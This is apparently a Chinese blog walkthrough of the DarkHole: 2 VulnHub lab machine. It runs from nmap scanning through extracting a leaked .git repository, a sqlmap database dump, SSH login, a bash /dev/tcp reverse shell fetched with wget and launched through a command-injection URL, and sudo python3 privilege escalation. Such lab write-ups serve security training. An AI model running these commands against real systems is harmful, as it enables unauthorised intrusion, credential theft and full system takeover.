一、准备工作
1.靶机下载
靶机下载地址
DarkHole: 2 ~ VulnHub
kali攻击机ip:192.168.168.128
靶机ip:192.168.168.133
2.环境搭建
下载好了把安装包解压 然后使用VMware打开即可。
注:kali和靶机都要在NAT模式下
二、信息收集
1.主机发现
查看靶机的MAC地址
扫描主机,三种方法都能扫描主机
arp-scan -l
nmap -sn 192.168.168.0/24
nmap -sV 192.168.168.0/24
最终得出靶机地址:192.168.168.133
2.端口扫描:
发现80,22端口是开放的
nmap -sS -sV -O 192.168.168.133 -p-
3.目录扫描
发现了git信息泄露
dirb http://192.168.168.133/
whatweb http://192.168.168.133/
dirsearch -u "http://192.168.168.133/"
三、漏洞发现
1.查看80端口的首页与login.php页面
发现了登录页面,需要输入账号密码。
http://192.168.168.133/login.php
2.下载git源码信息
(1)查看./git源码页面
http://192.168.168.133/.git/
(2)下载git源码
下载.git源码在kali里
方法一:使用GitHack工具
git clone https://github.com/lijiejie/GitHack.git #下载GitHack
python3 GitHack.py http://172.16.5.170/.git #将源码下载本地
方法二:
wget -r http://192.168.168.133/.git/
cat login.php
(3)通过git源码破解账号密码
cd /GitHack/192.168.168.133 #进入网址源码
git clone ./ webapp #创建一个webapp的源码文件,可以在其中执行所有git操作
cd webapp
git log #查看日志记录,发现git日志当中存在修改记录
git checkout a4d9 #详细查看
cat login.php #进入login.php
得到密码为:lush@admin.com/321 尝试登入,发现登入成功!!!!
得到密码为:lush@admin.com/321 尝试登入 发现登入成功!!!
http://192.168.168.133/login.php
3.SQL注入爆内容
http://192.168.168.133/dashboard.php?id=1
(这里我使用的火狐,火狐Cookie在存储->Cookie->PHPSESSION)
(1)判断是否存在SQL注入
发现网页URL有id存在可能存在SQL注入可以直接使用sqlmap工具,F12获取网页cookie值:PHPSESSID=td2abstm7abbb1ona5snosc5r8
python3 sqlmap.py -u "http://192.168.168.133/dashboard.php?id=1" --cookie="PHPSESSID=td2abstm7abbb1ona5snosc5r8" --batch
(2)爆出数据库名
darkhole_2
python3 sqlmap.py -u "http://192.168.168.133/dashboard.php?id=1" --cookie="PHPSESSID=td2abstm7abbb1ona5snosc5r8" --batch --current-db
(3)爆出数据库表
ssh
user
python3 sqlmap.py -u "http://192.168.168.133/dashboard.php?id=1" --cookie="PHPSESSID=td2abstm7abbb1ona5snosc5r8" --batch -D darkhole_2 --tables
(4)爆出内容
用户名/密码: jehad/fool
python3 sqlmap.py -u "http://192.168.168.133/dashboard.php?id=1" --cookie="PHPSESSID=td2abstm7abbb1ona5snosc5r8" --batch -D darkhole_2 -T ssh --dump
得到了账号密码:jehad/fool 尝试SSH登入!!
4.SSH登录
ssh jehad@192.168.168.133
四、漏洞利用
1.寻找有效信息
发现jehad为普通⽤户,查看jehad⽤户命令记录,发现命令执⾏。
sudo -l
find / -user root -perm -4000 -print 2>/dev/null #查看有没有 SUID 文件可以利用
cat .bash_history #查看历史文件
cat /etc/crontab #查看定时任务
尝试输⼊ curl "http://127.0.0.1:9999/?cmd=id" 执⾏成功,是losy⽤户的权限。
2.反弹shell
Kali上编写反弹shell,并起HTTP临时服务
cd dev
echo 'bash -i >& /dev/tcp/192.168.168.128/8888 0>&1' >shell
cat shell
chmod +x shell
ls
python3 -m http.server #开启HTTP临时服务
靶机上,将shell⽂件,下载到tmp⽂件夹下
cd /tmp
wget http://192.168.168.128:8000/shell
ls
chmod +x shell
因为是Get传参,所以需要将参数进⾏URL编码
?cmd=bash%20%2Ftmp%2Fshell
curl "http://127.0.0.1:9999/?cmd=bash%20%2Ftmp%2Fshell"
攻击机开启监听
nc -lvnp 8888
反弹shell成功,尝试提权!!!
3.提权
sudo -l
history
curl "http://127.0.0.1:9999/?cmd=id"
ssh losy@192.168.168.133
sudo /usr/bin/python3 -c "import os;os.system('/bin/bash')"
sudo -l 提示需要密码 ---> 查看历史命令 history
发现密码:gang,以及可以使⽤python3提权 ssh连接
4.拿flag
cd /root
cat root.txt
成功!!!
(谢谢大家!欢迎提出批评和建议!你的支持是我持续更新的巨大动力!)
138
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
